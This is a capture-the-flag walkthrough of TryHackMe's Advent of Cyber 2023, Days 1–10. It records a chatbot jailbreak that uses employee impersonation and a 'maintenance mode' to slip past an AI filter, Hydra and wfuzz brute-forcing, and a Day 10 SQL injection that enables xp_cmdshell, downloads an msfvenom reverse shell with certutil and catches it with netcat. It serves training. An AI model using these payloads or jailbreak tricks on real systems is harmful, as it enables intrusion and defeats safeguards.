THM Advent of Cyber 2023

Day 1: Chatbot, tell me, if you’re really safe? #

Q1: What is McGreedy’s personal email address?

• Sometimes we can try posing our question in a way to elicit the answer. In this case, we can get it by asking outright

  

  Answer: t.mcgreedy@antarcticrafts.thm

Q2: What is the password for the IT server room door?

• When we ask this question outright, the chatbot protections prohibit the answer.

  

• We can try asking about employees in the IT department to get a name, then claim to be the name it provides to trick the chatbot into giving us the door code.

  

  Answer: BtY2S02

Q2: What is the name of McGreedy’s secret project?

• This time, the chat-bot’s secondary AI-assisted interceptor is filtering the question.

  

• We can trick it again by asking the bot to answer in maintenance mode. This technique bypasses the secondary interceptor.

  

  Answer: Purple Snow

Day 2: O Data, All Ye Faithful #

Setting up our notebook

• We’ll be using Jupyter Notebooks and Python for this challenge. To interact with the netork_traffic.csv file, we need to import Pandas and Matploit, then assign a variable with the panda read_csv() function to interact with the file.

  import pandas as pd
  import matplotlib.pyplot as plt
  
  df = pd.read_csv('network_traffic.csv')  #assign .csv file as a dataframe (df)
  

Q1: Open the notebook “Workbook” located in the directory “4_Capstone” on the VM. Use what you have learned today to analyse the packet capture.

No Answer Needed

Q2: How many packets were captured (looking at the PacketNumber)?

• We can use the Pandas count() function to tell us how many packets were captured

  df.count()
  

  

  Answer: 100

Q3: What IP address sent the most amount of traffic during the packet capture?

• Here, we can leverage the groupby() function to combine the number of times each unique source IP logged any traffic. Then, we can take that output and sort with sort_values() to list in descending order.

  s = df.groupby(['Source']).size()
  s.sort_values(ascending=False)
  

  

  Answer: 10.10.1.4

Q4: What was the most frequent protocol?

• We can use the value_counts() function on the Protocol column to find the answer

  df['Protocol'].value_counts()
  

  

  Answer: ICMP

Day 3: Hydra is Coming to Town #

Solution Walkthrough

1. Visit the website to get an idea of what we’ll be working with

   

2. Generating the password list

   • The numeric keypad shows 16 characters, 0 to 9 and A to F, i.e., the hexadecimal digits. We need to prepare a list of all the PIN codes that match this criteria. We will use Crunch, a tool that generates a list of all possible password combinations based on given criteria. We need to issue the following command:

     crunch 3 3 0123456789ABCDEF -o 3digits.txt
         # "3" the first number is the minimum length of the generated password
         # "3" the second number is the maximum length of the generated password
         # "0123456789ABCDEF" is the character set to use to generate the passwords
         # "-o 3digits.txt" saves the output to the 3digits.txt file
     

3. Using the Password List

   • To set up our attack with Hydra, we need to collect some properties from the page’s HTML code first. We can do that by right-clicking on the page and selecting “View Page Source”. We’ll be looking at:

     1. The method is post
     2. The URL is http://10.10.156.21:8000/login.php
     3. The PIN code value is sent with the name pin

     

   • The main login page at http://10.10.152.21:8000/pin.php receives input from the user and sends it to /login.php using the name pin

   • We’ll set up our attack with the following command:

     hydra -l '' -P 3digits.txt -f -v 10.10.156.21 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
         # -l '' indicates that the login name is blank as the security lock only requires a password
         # -P 3digits.txt specifies the password file to use
         # -f stops Hydra after finding a working password
         # -v provides verbose output and is helpful for catching errors
         # 10.10.156.21 is the IP address of the target
         # http-post-form specifies the HTTP method to use
         # "/login.php:pin=^PASS^:Access denied" has three parts separated by :
             # /login.php is the page where the PIN code is submitted
             # pin=^PASS^ will replace ^PASS^ with values from the password list
             # Access denied indicates that invalid passwords will lead to a page that contains the text “Access denied”
         # -s 8000 indicates the port number on the target
     

   • Hydra found a valid PIN!

     

   • Let’s use it to login, unlock the door, and retrieve the flag.

     

Q1: Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

Answer: THM{pin-code-brute-force}

Day 4: Baby, it’s CeWLd outside #

Solution Walkthrough

1. Let’s create a password list with the content from the AntartiCrafts homepage using CeWL

   cewl -d 2 -m 5 -w passwords.txt http://10.10.87.36 --with-numbers
       # -d <x>,--depth <x>: Depth to spider to, default 2.
       # -m, --min_word_length: Minimum word length, default 3.
       # -w, --write: Write the output to the file.
       # --with-numbers: Accept words with numbers in as well as just letters
   

   • We can verify the contents of our new passwords.txt file and see that we have 253 unique words to try as passwords

     cat passwords.txt | wc -l       #list the number of lines in the file
     cat passwords.txt | head -15    #show the first 15 lines in the file
     

     

2. Let’s also create a list of potential usernames based on the Team Members page with CeWL, then verify our content.

   

   cewl -d 0 -m 5 -w usernames.txt http://10.10.87.36/team.php --lowercase
       # --lowercase: Lowercase all parsed words
   cat usernames.txt | wc -l
   cat usernames.txt | head -15
   

   

3. With our list for users and passwords in hand, let’s try to brute-force the login portal at http://10.10.87.36/login.php using wfuzz

   • To set up our attack, we want to know what error message appears with invalid credentials so we can hide hide our incorrect attempts. We can attempt to login with something random to trigger the error:

     

   • Now that we know the error syntax, let’s run the following:

     wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.87.36/login.php -d "username=FUZZ&password=FUZ2Z"
         # -c, output with colors
         # -z payload, Specify a payload for each FUZZ keyword
         # --ss/hs regex, Show/Hide responses with the specified regex within the content
         # -u url , Specify a URL for the request
         #-d postdata, Use post data (ex: "id=FUZZ&pass=FUZ2Z")
     

   • And with that, we have a match for Isaias’ credentials!

     

4. Use the credentials we just found to login to the site and retrieve the flag.

   

Q1: What is the correct username and password combination? Format - username:password

Answer: isaias:Happiness

Q2: What is the flag?

Answer: THM{m3rrY4nt4rct1crAft$}

Day 5: A Christmas DOScovery: Tapes of Yule-tide Past #

Solution Walkthrough

Q1: How large (in bytes) is the AC2023.BAK file?

1. To find the file size, we can look in the third column after running the dir command.

   

   Answer: 12,704

Q2: What is the name of the backup program?

1. We can use the type command to view contents in .txt files. If we look at C:\TOOLS\BACKUP\README.TXT, we’ll find the program name in the Acknowledgements section

   type C:\TOOLS\BACKUP\README.TXT
   

   

   Answer: BackupMaster3000

Q3: What should the correct bytes be in the backup’s file signature to restore the backup properly?

1. This information is also provided in the Troubleshooting section of the README.TXT found in C:\TOOLS\BACKUP.

   

   Answer: 41 43

Q4: What is the flag after restoring the backup successfully?

1. If we try to restore the backup, we get the following error:

   C:\TOOLS\BACKUP\BUMASTER.EXE C:\AC2023.BAK
   

   

2. Let’s reference the troubleshooting message from Q3. We can inspect our file header using the edit command to see if it has the proper signature.

   

3. We can immediately see that XX isn’t the correct value for our header. In order to update the header, we first need to know the ASCII representation of 41 43 (which was provided in hexadecimal format). We can use the “From Hex” recipe in CyberChef to return AC

   

4. Let’s modify our header value to AC.

   

   • To save, press ALT, then navigate to File > Save with the arrow keys.

5. With the proper magic bytes restored in the file header, we can run the backup command again and retrieve the flag!

   C:\TOOLS\BACKUP\BUMASTER.EXE C:\AC2023.BAK
   

   

   Answer: THM{0LD_5CH00L_C00L_d00D}

Day 6: Memories of Christmas Past #

Solution Walkthrough

• If we open the debugging panel, we can see that a 12-byte buffer has been allocated for player_name. If we collect at least 13 coins and use all of them for a new name, the value runs past our player_name into the coins field. Notice how doing this automatically changes the number of coins we have. Maybe we can leverage this to answer the questions below… 🤔

  

Q1: If the coins variable had the in-memory value in the image below, how many coins would you have in the game?

1. Like the examples in the question, we can assume that the game was built using a common DOS-based compiler (such as C++), meaning the values are held in little endian format. This means we need to reverse the byte order of the coins value to accurately represent the answer. Instead of using the given hex value of 0x4f4f5053, we’ll use 0x53504f4f.

2. With correct hex value in the proper order, we can use the Programmer Mode on our calculator to determine the number of coins.

   

   Answer: 1397772111

Q2: What is the value of the final flag?

1. To get the flag, we need to collect at least 10000 coins to buy the star from the store.

   

2. However, the in-game PC only allows us to collect 16 coins before it breaks. Going back to our name, we now know that our player name has a maximum buffer size of 12 bytes. Let’s take those 16 coins, which buys us 16 characters to rename our character.

3. If we change our name to 12 As, then 4 Bs (AAAAAAAAAAAABBBB), we can overwrite and gain control of the the coins value (or what would be the the instruction pointer). Now that we have control with our Bs, which can see the hex values of 42 are properly aligned in the coins value, giving us more than enough coins to purchase the star and retrieve the flag.

   

4. ⚠️ Wait! We still can’t get the star. Even though we have enough coins, the logic in the game prevents us from buying the star outright. Let’s return to the fact that we can overrun the buffer; maybe we can also control the values held in inv_items?

5. Indeed we can! We could compare this challenge to a real ret2libc buffer overflow by overwriting the return pointer with the value for a different location in memory. Instead of only using 16 characters, let’s use 44 to fill up the buffer, then replace the 45th value with d (the store’s value for the star) to autmatically add one to our inventory. Now we can grab the flag!

   

   Answer: THM{mchoneybell_is_the_real_star}

Day 7: ‘Tis the season for log chopping! #

Provided log format:

Q1: How many unique IP addresses are connected to the proxy server?

• Let’s get an idea of what the log contents look like to see how we can parse through the data. We can see that it lines up with the provided format with SPACE as the delimiter.

  cat access.log | head -5  #list the first 5 lines in the log file
  

  

• We can use the cut command with the space delimiter -d ' ' in the second field (Source IP) -f2 against our log file access.log. Then we can pipe the output into sort, uniq, and use word count wc -l to see unique IP Addresses.

  cut -d ' ' -f2 access.log | sort | uniq | wc -l
  

  

  Answer: 9

Q2: How many unique domains were accessed by all workstations?

• For this one, we have domain:port in field 3, so we’ll need to pipe the output of cut into cut again, but with a colon ‘:’ as the delimiter to filter out the port, then sort our results.

  cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq | wc -l
  

  

  Answer: 111

Q3: What status code is generated by the HTTP requests to the least accessed domain?

• We can do this over two steps. First, we need to find the least accessed domain. We can use cut twice like before to isolate the domain, then use sort, uniq -c, then sort again to list our output in ascending order.

  cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort | head -5
  

  

• Second, we know that we are looking for the partnerservices.getmicrosoftkey.com domain based on what we found in step one. We can grep for that value, then use cut, sort, and uniq again to isolate the status code for the answer.

  grep "partnerservices.getmicrosoftkey.com" access.log | cut -d ' ' -f6 | uniq -c
  

  

  Answer: 503

Q4: Based on the high count of connection attempts, what is the name of the suspicious domain?

• We can use the same logic from step one in the previous question. This time, we’ll pipe our ouput to tail to see the largest number of connection attempts. One domain stands out from the others, which is our answer.

  cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort | tail
  

  

  Answer: frostlings.bigbadstash.thm

Q5: What is the source IP of the workstation that accessed the malicious domain?

• We can now grep for “frostlings” as the malicious domain, then verify that there was only a single IP using cut, sort, and uniq.

  grep "frostlings" access.log | cut -d ' ' -f2 | sort | uniq -c
  

  

  Answer: 10.10.185.225

Q6: How many requests were made on the malicious domain in total?

• We can refrence the output from Q4 or Q5 since we used uniq -c for this answer.

  

  Answer: 1581

Q7: Having retrieved the exfiltrated data, what is the hidden flag?

• Chaining together all of the concepts we have covered so far, we saw that the HTTP URI contained some encoded text for each request to the malicious domain. We can refine our search, decode the text, then grep for a known flag character { to quickly identify the flag.

  grep "frostlings" access.log | cut -d ' ' -f5 | cut -d '=' -f2 | base64 -d | cut -d ',' -f3 |  grep {
  

  

  Answer: THM{a_gift_for_you_awesome_analyst!}

Day 8: Have a Holly, Jolly Byte! #

Q1: What is the malware C2 server?

• Navigating through the deleted files, we’ll eventually find a chat log where McGreedy provides the server name in clear text: root/DO_NOT_OPEN/secretchat.txt.

  

  Answer: mcgreedysecretc2.thm

Q2: What is the file inside the deleted zip archive?

• In the same deleted DO_NOT_OPEN directory, we’ll see the JuicyTomaTOY.zip archive. We can export with Right click > Export Files..., then browse the contents to find the file inside.

  

  Answer: JuicyTomaTOY.exe

Q3: What flag is hidden in one of the deleted PNG files?

• There are two different deleted .png files. Since we know the TryHackMe flag prefix is THM{, we can search the hex contents for this pattern. The flag is in root/portrait.png

  

  Answer: THM{byt3-L3vel_@n4Lys15}

Q4: What is the SHA1 hash of the physical drive and forensic image?

• With the image loaded into FTK Imager, we can navigate to File > Verify Drive/Image to view the SHA1 hash.

  

  Answer: 39f2dea6ffb43bf80d80f19d122076b3682773c2

Day 9: She sells C# shells by the C2shore #

Q1: What HTTP User-Agent was used by the malware for its connection requests to the C2 server?

• After we have loaded our malware sample into dnSpy for static analysis, we can click on the Main() function, then navigate to the GetIt() function on in the Assembly Explorer to view the httpWeb.Request.UserAgent property for the answer.

  

  Answer: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15

Q2: What is the HTTP method used to submit the command execution output?

• We can take a look at the PostIt() function in the Assembly Explorer to find the httpWebRequest.Method

  

  Answer: POST

Q3: What key is used by the malware to encrypt or decrypt the C2 data?

• We can look at the Encryptor() function for this answer. It will be under Encoding.ASCII.GetBytes()

  

  Answer: youcanthackthissupersecurec2keys

Q4: What is the first HTTP URL used by the malware?

• To find the first HTTP URL, we can go back to the Main() function. From there, we’ll see some string variable assignments. str is used to assign the base URL, then url concatenates “/reg” to the string stored in url

  

  Answer: http://mcgreedysecretc2.thm/reg

Q5: How many seconds is the hardcoded value used by the sleep function?

• The Sleeper() function references the count variable assigned in the main function, which is the integer 15000.

  int count = 15000
  

  

• If we hover over the Sleep(count) function, which is the same as Sleep(15000), we can see that this is translated in milliseconds. 15000 milliseconds == 15 seconds.

  

  

  Answer: 15

Q6: What is the C2 command the attacker uses to execute commands via cmd.exe?

• The Main function lists the following instructions available to the attacker sleep, shell, implant, and quit. A shell meets the criteria for executing commands, and is our answer on this one.

  

  Answer: shell

Q7: What is the domain used by the malware to download another binary?

• We can see that if the implant instruction is called, the code jumps to where the domain is assigned to the tex2 variable. We can submit the domain without the /spykit.exe for the final answer of this challenge.

  

  Answer: stash.mcgreedy.thm

Day 10: Inject the Halls with EXEC Queries #

Category: SQL Injection

The Best Festival Company started receiving many reports that their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year! After looking into the matter, Santa’s Security Operations Center (SSOC) confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server as the user credentials have been changed. With no other way to revert the changes, Elf Exploit McRed has been tasked with attempting to hack back into the server to regain access.

After conducting some initial research, Elf Forensic McBlue came across a forum post made on the popular black hat hacking internet forum, JingleHax. The post, made earlier in the month, explains that the poster is auctioning off several active vulnerabilities related to Best Festival Company systems:

This forum post surely explains the havoc that has gone on over the past week. Armed with this knowledge, Elf Exploit McRed began testing the company website from the outside to find the vulnerable components that led to the server compromise. As a result of McRed’s thorough investigation, the team now suspects a possible SQL injection vulnerability.

Q1: Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?

• We can find the gift-finding feature on the homepage by scrolling down to the Gift Search section. It will take us to /giftsearch.php

  

  Answer: /giftsearch.php

Q2: Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?

• We are able to generate an error, effectively “breaking” the SQL query which allows us to see back-end information about the database. If we insert a single quote after the age= paramater in the web query, we can learn more about the database.

  

  Answer: ODBC Driver 17 for SQL Server

Q3: Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?

• We can use the single quote character to break the query after age like we did before, then inject a truth statement (1=1) to dump the contents stored in the database. The flag is at the bottom of the page.

  http://10.10.203.168/giftresults.php?age=' OR 1=1 --
  

  

  Answer: THM{a4ffc901c27fb89efe3c31642ece4447}

Q4: What flag is in the note file Gr33dstr left behind on the system?

• Microsoft SQL Server uses stored procedures, which can be thought of as extended functions or a prepared SQL code that can be saved and re-used. One of those precedures on a Microsoft SQL Server is called xp_cmdshell, which allows for executing operating system calls. This is a legacy feature, but could still be enabled or in use on legacy systems.

• We can try stacking queries to enable xp_cmdshell on the Best Festival Company database using EXECUTE (EXEC) queries. We’ll first enable advanced configuration options in SQL Server by setting show advanced options to 1. We then apply the change to the running configuration via the RECONFIGURE statement. Next, we enable the xp_cmdshell procedure by setting xp_cmdshell to 1 and applying the change to the running configuration again.

  http://10.10.203.168/giftresults.php?age='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
  

• This will not output anything to us as the attacker, so we can try to validate by sending a payload to the database to initiate a reverse shell back to our attack workstation.

• To set up a reverse shell, we need to generate an executable that will initiate a callback to the attack workstation. We can use MSFvenom to create a payload for this purpose.

  msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.2.14.75 LPORT=4444 -f exe -o reverse1.exe
  

• Now that we have an executable ready, we need to send it to the database server. We can serve it from our attack workstation using a python simple http server.

  python3 -m http.server 9000
  

  

• With our server running, we can leverage the vulnerable SQL server to inject EXEC commands that will download the file from our attack workstation.

  http://10.10.203.168/giftresults.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://10.2.14.75:9000/reverse1.exe C:\Windows\Temp\reverse1.exe'; --
  

• This command won’t return anything in the browser, but we can see if the request to download the file occurred by taking a look at the console where our http server is running. There is a successful get request for our payload!

  

• Since our payload was sucessfully downloaded onto the target, we know that xp_cmdshell was enabled. Now, we can set up a netcat listener on our attack machine to catch the callback from the target.

  nc -lvnp 4444
  

  

• With our listener running, we need to inject one last SQL payload to execute the binary containing our reverse shell.

  http://10.10.203.168/giftresults.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse1.exe'; --
  

• And we are in! Our reverse shell is connected under the context of the mssql$sqlexpress user

  

• Finally, we can find the note that Gr33dstr left behind in C:\Users\Administrator\Desktop\Note.txt to reveal the flag.

  

Q5: What is the flag you receive on the homepage after restoring the website?

• After reading the instructions in Gr33dstr’s note, we can run the restore_website.bat file to return the website to its original state and collect the flag.

  

  

Day 11: Jingle Bells, Shadow Spells #